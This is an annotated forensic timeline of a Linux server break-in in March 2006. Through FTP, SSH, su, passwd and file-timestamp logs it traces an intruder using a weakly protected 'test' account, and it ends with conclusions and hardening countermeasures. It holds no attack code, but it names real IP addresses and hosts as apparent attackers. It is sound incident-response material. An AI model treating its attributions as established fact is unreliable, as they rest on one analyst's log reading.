2006/03/09 14:57:31	82.79.137.28	*	vsftpd: Thu Mar  9 14:57:31 2006 [pid 5543] [test] OK LOGIN: Client 		"82.79.137.28"
2006/03/09 14:57:31	82.79.137.7	*	vsftpd: Thu Mar  9 14:57:31 2006 [pid 5547] [test] OK LOGIN: Client 		"82.79.137.7"
2006/03/09 14:57:33	82.79.137.28	*	vsftpd: Thu Mar  9 14:57:33 2006 [pid 5561] [test] OK LOGIN: Client 		"82.79.137.28"
2006/03/09 14:57:33	82.79.137.30	*	vsftpd: Thu Mar  9 14:57:33 2006 [pid 5563] [test] OK LOGIN: Client 		"82.79.137.30"
2006/03/09 15:01:29	82.79.137.30		30.metronetwork.rdsbz.ro - - [09/Mar/2006:15:01:29 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:01:30	82.79.137.30		30.metronetwork.rdsbz.ro - - [09/Mar/2006:15:01:30 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.60/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:01:34	82.79.137.6		Mar  9 15:01:34 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.6
2006/03/09 15:01:36	82.79.137.6		vsftpd: Thu Mar  9 15:01:36 2006 [pid 5944] [anonymous] FAIL LOGIN: Client 	"82.79.137.6"
2006/03/09 15:01:37	82.79.137.27		Mar  9 15:01:37 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.27
2006/03/09 15:01:39	82.79.137.27		vsftpd: Thu Mar  9 15:01:39 2006 [pid 5946] [anonymous] FAIL LOGIN: Client 	"82.79.137.27"
2006/03/09 15:01:45	82.79.137.18	*	vsftpd: Thu Mar  9 15:01:45 2006 [pid 5963] [test] OK LOGIN: Client 		"82.79.137.18"
2006/03/09 15:01:47	82.79.137.9	*	vsftpd: Thu Mar  9 15:01:47 2006 [pid 5967] [test] OK LOGIN: Client 		"82.79.137.9"
2006/03/09 15:02:07	82.79.137.20		20.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:07 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:02:08	82.79.137.20		20.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:08 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.59/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:02:35	82.79.137.18		18.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:35 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:02:36	82.79.137.18		18.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:36 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.51/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"


						ratibus  pts/2        82.233.38.20     Thu Mar 16 23:13 - 23:14  (00:00)
2006/03/17 00:12:32	193.230.222.209	*	Mar 17 00:12:32 localhost sshd[30299]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3741 ssh2
2006/03/17 00:12:32	193.230.222.209	*	Mar 17 00:12:32 localhost sshd[30318]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 00:12	193.230.222.209	*	test     pts/2        193.230.222.209  Fri Mar 17 00:12 - 00:30  (00:18)
2006/03/17 00:12:45	193.230.222.209	*!!	Mar 17 00:12:45 localhost passwd[30326]: (pam_unix) password changed for test
2006/03/17 00:12:45	193.230.222.209	*!!	Mar 17 00:12:45 localhost passwd[30326]: (pam_unix) Password for test was changed
2006/03/17 00:15:35	193.230.222.209	*	Mar 17 00:15:35 localhost sshd[30439]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3744 ssh2
2006/03/17 00:15:35	193.230.222.209	*	Mar 17 00:15:35 localhost sshd[30454]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 00:15	193.230.222.209	*	test     pts/3        193.230.222.209  Fri Mar 17 00:15 - 00:15  (00:00)
2006/03/17 00:15:52	193.230.222.209	*	Mar 17 00:15:52 localhost sshd[30454]: (pam_unix) session closed for user test
2006/03/17 00:17:28	193.230.222.209	*.	Mar 17 00:17:28 localhost su[30537]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost=  user=vinoj
2006/03/17 00:17:30	193.230.222.209	*.	Mar 17 00:17:30 localhost su[30537]: pam_authenticate: Authentication failure
2006/03/17 00:17:30	193.230.222.209	*.	Mar 17 00:17:30 localhost su[30537]: - pts/2 test:vinoj
2006/03/17 00:17:36	193.230.222.209	*.	Mar 17 00:17:36 localhost su[30547]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost=  user=vinoj
2006/03/17 00:17:38	193.230.222.209	*.	Mar 17 00:17:38 localhost su[30547]: pam_authenticate: Authentication failure
2006/03/17 00:17:38	193.230.222.209	*.	Mar 17 00:17:38 localhost su[30547]: - pts/2 test:vinoj
2006/03/17 00:18:42	193.230.222.209	.*	Mar 17 00:18:42 localhost sshd[30594]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=209-nat.s-man.net  user=croulants
2006/03/17 00:18:45	193.230.222.209	.*	Mar 17 00:18:45 localhost sshd[30591]: error: PAM: Authentication failure for croulants from 209-nat.s-man.net
2006/03/17 00:18:51	193.230.222.209	.*	Mar 17 00:18:51 localhost sshd[30591]: error: PAM: Authentication failure for croulants from 209-nat.s-man.net
2006/03/17 00:18:59	193.230.222.209	.*	Mar 17 00:18:59 localhost sshd[30591]: error: PAM: Have exhasted maximum number of retries for service. for croulants from 209-nat.s-man.net
2006/03/17 00:19:10	193.230.222.209	.*	Mar 17 00:19:10 localhost sshd[30591]: error: PAM: Have exhasted maximum number of retries for service. for croulants from 209-nat.s-man.net
2006/03/17 00:19:10	193.230.222.209	.*	Mar 17 00:19:10 localhost sshd[30591]: Failed keyboard-interactive/pam for croulants from 193.230.222.209 port 3753 ssh2
2006/03/17 00:19:50	193.230.222.209	*.	Mar 17 00:19:50 localhost su[30638]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost=  user=trollingsecours
2006/03/17 00:19:52	193.230.222.209	*.	Mar 17 00:19:52 localhost su[30638]: pam_authenticate: Authentication failure
2006/03/17 00:19:52	193.230.222.209	*.	Mar 17 00:19:52 localhost su[30638]: - pts/2 test:trollingsecours
2006/03/17 00:19:57	193.230.222.209	*.	Mar 17 00:19:57 localhost su[30643]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost=  user=trollingsecours
2006/03/17 00:19:59	193.230.222.209	*.	Mar 17 00:19:59 localhost su[30643]: pam_authenticate: Authentication failure
2006/03/17 00:19:59	193.230.222.209	*.	Mar 17 00:19:59 localhost su[30643]: - pts/2 test:trollingsecours
2006/03/17 00:20:04	193.230.222.209	*.	Mar 17 00:20:04 localhost su[30644]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost=  user=trollingsecours
2006/03/17 00:20:06	193.230.222.209	*.	Mar 17 00:20:06 localhost su[30644]: pam_authenticate: Authentication failure
2006/03/17 00:20:06	193.230.222.209	*.	Mar 17 00:20:06 localhost su[30644]: - pts/2 test:trollingsecours
2006/03/17 00:26:26	193.230.222.253		193.230.222.253 - - [17/Mar/2006:00:26:26 +0100] "GET / HTTP/1.0" 200 1053 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
2006/03/17 00:26:27	193.230.222.253		193.230.222.253 - - [17/Mar/2006:00:26:27 +0100] "GET /logowhite.png HTTP/1.0" 200 19801 "http://213.186.53.59/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
2006/03/17 00:26:28	193.230.222.253		193.230.222.253 - - [17/Mar/2006:00:26:28 +0100] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
2006/03/17 00:28:33	193.230.222.209	*	Mar 17 00:28:33 localhost sshd[31078]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3788 ssh2
2006/03/17 00:28:33	193.230.222.209	*	Mar 17 00:28:33 localhost sshd[31107]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 00:28	193.230.222.209	*	test     pts/4        193.230.222.209  Fri Mar 17 00:28 - 00:30  (00:01)
2006/03/17 00:28:40	193.230.222.209	*!	Mar 17 06 00:28:40        0 ..c crw--w---- test     tty      /dev/pts/5
2006/03/17 00:29:02	193.230.222.209	*!	Mar 17 06 00:29:02        0 .a. crw--w---- test     tty      /dev/pts/5
2006/03/17 00:30:31	193.230.222.209	*	Mar 17 00:30:31 localhost sshd[31107]: (pam_unix) session closed for user test
2006/03/17 00:30:33	193.230.222.209	*	Mar 17 00:30:33 localhost sshd[30318]: (pam_unix) session closed for user test
						Mar 17 06 06:35:02        0 m.c prw-r----- root     adm      /dev/xconsole

2006/03/17 09:00:52	193.230.222.209	*	Mar 17 09:00:52 localhost sshd[25229]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3050 ssh2
2006/03/17 09:00:52	193.230.222.209	*	Mar 17 09:00:52 localhost sshd[25263]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 09:00	193.230.222.209	*	test     pts/4        193.230.222.209  Fri Mar 17 09:00 - 09:38  (00:37)
2006/03/17 09:03:43	193.230.222.209	*!	Mar 17 06 09:03:43        0 ..c crw--w---- test     tty      /dev/pts/6
2006/03/17 09:03:58	193.230.222.209	*!	Mar 17 06 09:03:58        0 .a. crw--w---- test     tty      /dev/pts/6
2006/03/17 09:38:33	193.230.222.209	*	Mar 17 09:38:33 localhost sshd[25263]: (pam_unix) session closed for user test

2006/03/17 12:19:43	193.230.222.209	*	Mar 17 12:19:43 localhost sshd[14815]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3222 ssh2
2006/03/17 12:19:43	193.230.222.209	*	Mar 17 12:19:43 localhost sshd[14834]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 12:19	193.230.222.209	*	test     pts/3        193.230.222.209  Fri Mar 17 12:19 - 14:25  (02:05)
2006/03/17 12:26:01	193.230.222.209	*	Mar 17 12:26:01 localhost sshd[15484]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3338 ssh2
2006/03/17 12:26:01	193.230.222.209	*	Mar 17 12:26:01 localhost sshd[15511]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 12:26	193.230.222.209	*	test     pts/4        193.230.222.209  Fri Mar 17 12:26 - 14:30  (02:04)
2006/03/17 12:32:44	193.230.222.209	*	Mar 17 12:32:44 localhost sshd[16030]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3353 ssh2
2006/03/17 12:32:44	193.230.222.209	*	Mar 17 12:32:44 localhost sshd[16037]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 12:32	193.230.222.209	*	test     pts/7        193.230.222.209  Fri Mar 17 12:32 - 16:26  (03:53)
2006/03/17 14:25:38	193.230.222.209	*	Mar 17 14:25:38 localhost sshd[14834]: (pam_unix) session closed for user test
2006/03/17 14:30:58	193.230.222.209	*	Mar 17 14:30:58 localhost sshd[15511]: (pam_unix) session closed for user test
2006/03/17 14:36:43	193.230.222.209	*	Mar 17 14:36:43 localhost sshd[585]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3934 ssh2
2006/03/17 14:36:43	193.230.222.209	*	Mar 17 14:36:43 localhost sshd[671]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 14:36	193.230.222.209	*	test     pts/3        193.230.222.209  Fri Mar 17 14:36 - 16:49  (02:12)
2006/03/17 14:59:56	193.230.222.209	*	Mar 17 14:59:56 localhost sshd[5706]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 4025 ssh2
2006/03/17 14:59:56	193.230.222.209	*	Mar 17 14:59:56 localhost sshd[5714]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 15:00	193.230.222.209	*	test     pts/4        193.230.222.209  Fri Mar 17 15:00 - 17:12  (02:12)
2006/03/17 15:03:26	193.230.222.209	*	Mar 17 15:03:26 localhost sshd[6092]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 4027 ssh2
2006/03/17 15:03:26	193.230.222.209	*	Mar 17 15:03:26 localhost sshd[6171]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 15:03	193.230.222.209	*	test     pts/8        193.230.222.209  Fri Mar 17 15:03 - 15:14  (00:10)
2006/03/17 15:14:06	193.230.222.209	*	Mar 17 15:14:06 localhost sshd[6171]: (pam_unix) session closed for user test
2006/03/17 16:26:40	193.230.222.209	*	Mar 17 16:26:40 localhost sshd[16037]: (pam_unix) session closed for user test
2006/03/17 16:49:15	193.230.222.209	*	Mar 17 16:49:15 localhost sshd[671]: (pam_unix) session closed for user test
2006/03/17 17:12:46	193.230.222.209	*	Mar 17 17:12:46 localhost sshd[5714]: (pam_unix) session closed for user test
2006/03/17 17:18			#	## First mails blocked... no contact outside is possible via the default IP source
						Mar 17 19:30:39 localhost sshd[1425]: Accepted keyboard-interactive/pam for skycode from 213.49.238.76 port 1087 ssh2
						skycode  pts/3        213.49.238.76    Fri Mar 17 19:30   still logged in
						Mar 17 06 19:30:39        0 ..c crw--w---- skycode  tty      /dev/pts/3
						Mar 17 19:30:50 localhost sudo:  skycode : TTY=pts/3 ; PWD=/home/skycode ; USER=root ; COMMAND=/bin/bash
						Mar 17 19:33:45 localhost sshd[2170]: Accepted keyboard-interactive/pam for skycode from 213.49.238.76 port 1089 ssh2
						skycode  pts/4        213.49.238.76    Fri Mar 17 19:33   still logged in
						Mar 17 06 19:33:45        0 ..c crw--w---- skycode  tty      /dev/pts/4
						Mar 17 19:34:41 localhost sudo:  skycode : TTY=pts/4 ; PWD=/home ; USER=root ; COMMAND=/bin/bash
2006/03/17 19:37:19			 !	Mar 17 19:37:19 localhost su[2642]: + pts/4 root:test
						Mar 17 06 19:38:16        0 ..c crw--w---- root     tty      /dev/pts/7
2006/03/17 19:39:21			 !!	Mar 17 06 19:39:21     2467 m.c -rw-r----- root     shadow   /etc/shadow		= test:$ passwd?
2006/03/17 19:39:21			 !!	Mar 17 19:39:21 localhost passwd[2713]: (pam_unix) password changed for test
2006/03/17 19:39:21			 !!	Mar 17 19:39:21 localhost passwd[2713]: (pam_unix) Password for test was changed
2006/03/17 19:40:12			 !	Mar 17 19:40:12 localhost su[2763]: + pts/3 root:test

2006/03/17 19:40:19			 !	Mar 17 06 19:40:19     4096 m.. drwxr-xr-x test     test     /home/test
2006/03/17 19:40:19			 !	                       4096 m.. drwx------ test     test     /home/test/.mc/cedit	= test:$ mc?
2006/03/17 19:40:25			 !	Mar 17 06 19:40:25        0 m.. -rw-r--r-- test     test     /home/test/.mc/history	but test not loggued normally
2006/03/17 19:40:25			 !	                         35 m.. -rw-r--r-- test     test     /home/test/.mc/Tree	or via ./go??
2006/03/17 19:40:25			 !	                       4096 m.. drwxr-xr-x test     test     /home/test/.mc
2006/03/17 19:40:25			 !	                         32 m.. -rw-r--r-- test     test     /home/test/.mc/filepos
						=> /tmp/crontab.Hq7als/crontab 1;0
						=> correspond to crontab -e in .bash_history?...
2006/03/17 19:40:25			 !	                       1945 m.. -rw-r--r-- test     test     /home/test/.mc/ini
2006/03/17 19:40:31			 !	Mar 17 06 19:40:31     2117 m.. -rw------- test     test     /home/test/.bash_history
						phil     pts/8        85.234.194.12    Fri Mar 17 20:08 - 20:19  (00:11)
						phil     pts/8        85.234.194.12    Fri Mar 17 20:20   still logged in
						phil     pts/14       85.234.194.12    Fri Mar 17 21:14   still logged in
						skycode  pts/15       213.49.238.76    Fri Mar 17 21:39   still logged in
						Mar 17 06 21:05:08        0 m.. crw--w---- root     tty      /dev/pts/12
						                          0 m.. crw------- phil     tty      /dev/pts/8
						Mar 17 06 21:05:09        0 m.. crw--w---- test     tty      /dev/pts/5
						Mar 17 06 21:05:10        0 ma. crw-rw-rw- root     tty      /dev/ptmx
						                          0 m.. crw--w---- test     tty      /dev/pts/6
						                          0 .a. crw------- phil     tty      /dev/pts/8
						                          0 .a. crw-rw-rw- root     tty      /dev/tty
2006/03/17 21:10:59			 #	user.log: Mar 17 21:10:59 localhost rpc.mountd: export request from 127.0.0.1
2006/03/17 21:10:59			 #	user.log: Mar 17 21:10:59 localhost rpc.mountd: dump request from 127.0.0.1
2006/03/17 21:28:56			 #	Mar 17 21:28:56 localhost -- MARK --
2006/03/17 21:30:03			 #	last occurence of 20060317 213003 start /sbin/modprobe -s -k -- net-pf-10 safemode=0
2006/03/17 21:30:03			 #	last occurence of 20060317 213003 probe ended
2006/03/17 21:45:04			 #	Mar 17 21:45:04 localhost snmpd[1467]: Connection from 127.0.0.1
2006/03/17 21:45:04			 #	Mar 17 21:45:04 localhost last message repeated 3 times
2006/03/17 21:48:56			 #	## No MARK at 21:48:56
2006/03/17 21:50:05			 #	Mar 17 21:50:05 localhost snmpd[1467]: Connection from 127.0.0.1
2006/03/17 21:55			 #	## No snmp at 21:55

TODO:
=====
ftp repository of test??
/var/cache/tct

Conclusions

  • Initial breach
    • automatic tool scanning ftp accounts could enter with the 'test' account
    • manual attempt to log in with the 'test' account
    • download over of sniffers and brute-force tools for ssh
    • transfers over ftp
    • change test password
    • 82.79.137.NN = NN.metronetwork.rdsbz.ro
    • 193.230.222.209 = 209-nat.s-man.net
  • Counter-measures
    • don't use dummy passwords ;-)
    • don't grant ftp/ssh rights per default
      sshd: make use of the "AllowUsers" keyword and explicitely add users when needed
    • don't grant internet access per default
      iptables: cf --uid-owner and other --XXX-owner options
      on OUTPUT table to avoid download of malicious code
      on INPUT table to avoid bindshells
  • Timeline
    • Before and during the live forensic analysis we should have written down our own actions and the observable elements rather that having to deduce them from the logs.